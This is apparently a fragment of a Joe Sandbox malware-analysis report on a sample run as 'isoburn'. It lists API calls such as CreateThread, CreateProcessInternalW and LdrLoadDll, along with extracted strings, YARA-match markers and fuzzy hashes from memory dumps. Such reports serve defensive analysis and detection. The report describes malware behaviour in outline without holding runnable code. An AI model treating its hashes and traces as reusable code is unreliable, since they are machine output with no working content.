                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D19E25
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                                                                                            • API String ID: 2422867632-999386047
                                                                                                                            • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                                                                                            • Instruction ID: 70151e560b6a7a839787b71f3609b7a05ab5b44828051b8f4845a8a80bee2423
                                                                                                                            • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                                                                                            • Instruction Fuzzy Hash: DA8166B0D05768CBEB20CF85C9587DEBAB1BB45309F1081D9D15C3B281C7BA1A89CF95
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                            • String ID: @J7<
                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                            • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                                                                                            • Instruction ID: 8a520bcd7f8687c2d010e1a1f7dc6df152ca71dfc63916520b7e9389d2321179
                                                                                                                            • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                                                                                            • Instruction Fuzzy Hash: BB4140B5A0060A9FDB00DFD8D8809EEB7B9FF88308B108559E915EB314D775AE05CBA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                            • String ID: @J7<
                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                            • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                                                                                            • Instruction ID: 99562908b633a32a2ad20744f2ada3395e0a57bae341a39ce7aff81deaf7476a
                                                                                                                            • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                                                                                            • Instruction Fuzzy Hash: D431EFB5A0060A9FDB10DFD8D8809EEB7B9FF88308B108559E915AB314D775EE45CBA0
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 02D33A5B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID: wininet.dll
                                                                                                                            • API String ID: 3472027048-3354682871
                                                                                                                            • Opcode ID: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                                                                                            • Instruction ID: 368771df1320617fd57e417b477b329b0bb9e64db2ae76bffec21e057848d2b2
                                                                                                                            • Opcode Fuzzy Hash: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                                                                                            • Instruction Fuzzy Hash: 9531BCB1601609BBD724DFA4CC84FEBB7B9EB88714F50411EE959AB340D770AA40CFA4
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D244D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                                                            • Instruction ID: 6ff6b2cb4d84f2b6f4170ec7f5658f0f9f01c4ab3859d0e18fc6c516740cf0fd
                                                                                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                                                            • Instruction Fuzzy Hash: 8B011AB5E4020DABDB10EBE4DC41FDEB3B99B54708F0041A5EE09A7241F671EB19CBA1
                                                                                                                            APIs
                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,02D2820E,00000010,?,?,?,00000044,?,00000010,02D2820E,?,?,?), ref: 02D39813
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2186235152-0
                                                                                                                            • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                                                            • Instruction ID: d3d7a0dae1634c15eb24479fa9a7934289df312d60f3775ab3ab7f686a9bc887
                                                                                                                            • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                                                            • Instruction Fuzzy Hash: CC0172B2204648BBCB54DE99DC81EDB77ADAB8D754F118108BA19A3241D630F8518BA4
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D19E25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                                                                                            • Instruction ID: 6bf4658c57f212a692b4ae2fded5aa795677b2f594c415dd13b313f4d0da4499
                                                                                                                            • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                                                                                            • Instruction Fuzzy Hash: 42F0657335131436D22061E9EC12FD7B78DCB85B65F140025F70CEA3C0DAA1F84146B5
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D19E25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                                                                                            • Instruction ID: 82aa13aa7b2ddd876ab37663e9b05202b098d8cc37d07dafce9e0c77ab509b45
                                                                                                                            • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                                                                                            • Instruction Fuzzy Hash: 9FF06D7228131432E22062A9DC52FD7769DCB95B61F100015F608AB3C0DAA5FC4186F9
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(02D21969,?,02D357BB,02D21969,02D3556F,02D357BB,?,02D21969,02D3556F,00001000,?,?,00000000), ref: 02D3970C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction ID: 19229763a2f1fb3424aa1c6da93ea5b361335e3700ad5ced70191c038335369f
                                                                                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction Fuzzy Hash: 75E065B2204604BBD714EE98EC41FAB77ADEFC9B50F004009FA0CA7281D630BD108BB4
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,02D23CE4,000000F4), ref: 02D3975C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                                                            • Instruction ID: a05551800d7b8821b4821811ce0c0ca51bd2cb97df200f254eff0f695421df8b
                                                                                                                            • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                                                            • Instruction Fuzzy Hash: A1E06D722046057BD614EF58EC45FAB37ADDFC9710F004418FA08A7341C670BD108AB4
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02D2827C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                                                                                            • Instruction ID: d372ccfb0403c1dbcac7859894d0b9490a2effd159abc9f80f1d333b394899e1
                                                                                                                            • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                                                                                            • Instruction Fuzzy Hash: FEE04F7524060826EA246AA8DC45FAA33589B5876CF5C8660FD1CDB3C5E778ED4191B0
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02D21C50,02D37EAF,02D3556F,02D21C1D), ref: 02D28073
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                                                                                            • Instruction ID: 4f5cc693ed5f3d6b25c552c61185d46cb58955fae6b99bb8b46515711b114692
                                                                                                                            • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                                                                                            • Instruction Fuzzy Hash: A1E0C2B16411003EF310AAB8DC06F95324CAB64718F1001A8F50CE7381DB70E4008534
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,02D21C50,02D37EAF,02D3556F,02D21C1D), ref: 02D28073
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                                                                                            • Instruction ID: 78692122d8a3b87eae8388c3ac1e5dac6d56b2a64a8c9de966ed206ee464257f
                                                                                                                            • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                                                                                            • Instruction Fuzzy Hash: 7AD05E716402083BF610A6B9DC06F96328D9B14768F544064FA0CE73C2EA64F80085B5
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000111), ref: 02D20D47
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1836367815-0
                                                                                                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                            • Instruction ID: 78d132fa18f14f407d7667115efaa23a296d72936399b0fa862b9d00f2e9c756
                                                                                                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                            • Instruction Fuzzy Hash: 20D0237770101C35A60145C46CC1DFFB71CDB847A6F004063FF08D1140D6615D0607B0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 1262a28ba1f4bb6d719a0acf38a47fb699a128c5a0a2f4b234756614e5f3cf34
                                                                                                                            • Instruction ID: 9cf1e8016d1d9343220ef8ddd99abb396d4560ebd26154b11958f42b47f3310b
                                                                                                                            • Opcode Fuzzy Hash: 1262a28ba1f4bb6d719a0acf38a47fb699a128c5a0a2f4b234756614e5f3cf34
                                                                                                                            • Instruction Fuzzy Hash: B4B09B729015C5C5EA51E7605608B2F79517BD0711F65C071F6030641F4778C5D1E975
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 89c287dd079860fb3e05075819a1487ac6220e035433a4d5ecb33cd3d9ec2480
                                                                                                                            • Instruction ID: 457a9808e39cdb1475b9b9a0bffcf2114a6afd2568611fa91a9e71a144f45511
                                                                                                                            • Opcode Fuzzy Hash: 89c287dd079860fb3e05075819a1487ac6220e035433a4d5ecb33cd3d9ec2480
                                                                                                                            • Instruction Fuzzy Hash: 3A51A4F6B0411BBFCB10DB98A89097FFBF9BB48200B548269F465D7641D274EE518FA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: be0491c9d102841463c0584c93a4a892f276370d3c46122e68ea72e492ccb47d
                                                                                                                            • Instruction ID: 0923febb60fc3fe5720fa110ce63bf3a70e76abe354232a0f4a489a12889b6dd
                                                                                                                            • Opcode Fuzzy Hash: be0491c9d102841463c0584c93a4a892f276370d3c46122e68ea72e492ccb47d
                                                                                                                            • Instruction Fuzzy Hash: 71511379A00646AFEB20DE5CD8D09BFB7FAAF44200B448459E896D7641E7B4EA40CB60
                                                                                                                            Strings
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 05074787
                                                                                                                            • ExecuteOptions, xrefs: 050746A0
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050746FC
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05074655
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05074725
                                                                                                                            • Execute=1, xrefs: 05074713
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05074742
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 0-484625025
                                                                                                                            • Opcode ID: d9d5313c52ae3ea3d16fb91fc118338ab97bd8472450526b5bae02b3054eaa49
                                                                                                                            • Instruction ID: d17322caf7b350ebe71a59d193aeb1d5e2586f1e8161c75f5af46e7e45d47270
                                                                                                                            • Opcode Fuzzy Hash: d9d5313c52ae3ea3d16fb91fc118338ab97bd8472450526b5bae02b3054eaa49
                                                                                                                            • Instruction Fuzzy Hash: 9951E3B1B00219BADF21EAA5BD9AFFE77ADFB14300F0400A9E505A7180DB71AB45CF55
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction ID: d07734d024f2e8e9fbdc8a4f7e37093742c9e31e24a79c3d6f0d1166a49abbea
                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction Fuzzy Hash: 7E020271608341AFC345DF18D494A6EFBE5FF88710F14892DB9898B264DB72E905CB62
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction ID: 3ed588ad53f797b3cf3106db19bc69498166bfcef5c765e5359cfaca5e1d35df
                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction Fuzzy Hash: BA81AFB0E092499ADF24DF68E991BFEBBE2BF45320F184169D892A7291C634D841CF50
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                            • Opcode ID: b1facb9652c22b45bca02833732f7cba68b3a95645e0f09166756b74cde3bb03
                                                                                                                            • Instruction ID: a31a54ab0fc1ce57342c5beadd696f904f3c750472713387a0e69f9803ba587c
                                                                                                                            • Opcode Fuzzy Hash: b1facb9652c22b45bca02833732f7cba68b3a95645e0f09166756b74cde3bb03
                                                                                                                            • Instruction Fuzzy Hash: D82179BAA0011AABDB10DF79EC94AFF77F9EF64650F080525ED05D3200E770D9028B91
                                                                                                                            Strings
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050702E7
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050702BD
                                                                                                                            • RTL: Re-Waiting, xrefs: 0507031E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                            • API String ID: 0-2474120054
                                                                                                                            • Opcode ID: 31ff30da731e191700107f3e99e8b41ead31677c76000c24561f99eefc45bc2d
                                                                                                                            • Instruction ID: 6f2c7e69e63dccf6335025974d451409f1fdfc53368be219729334358acf6af6
                                                                                                                            • Opcode Fuzzy Hash: 31ff30da731e191700107f3e99e8b41ead31677c76000c24561f99eefc45bc2d
                                                                                                                            • Instruction Fuzzy Hash: CDE1CD706087429FD724CF28E899B6EB7F1FB84364F144A29F4A68B2D0D774E845CB42
                                                                                                                            Strings
                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05077B7F
                                                                                                                            • RTL: Resource at %p, xrefs: 05077B8E
                                                                                                                            • RTL: Re-Waiting, xrefs: 05077BAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 0-871070163
                                                                                                                            • Opcode ID: 220d97d71d9a162c4bf35bcd64e9a76a8395c689e749c41a1cfa5f983e155cb1
                                                                                                                            • Instruction ID: 6609b658d1ff0b43aa29819a0ab10cc64db0cb50e7db5fa3b2c2d8d3322dd4be
                                                                                                                            • Opcode Fuzzy Hash: 220d97d71d9a162c4bf35bcd64e9a76a8395c689e749c41a1cfa5f983e155cb1
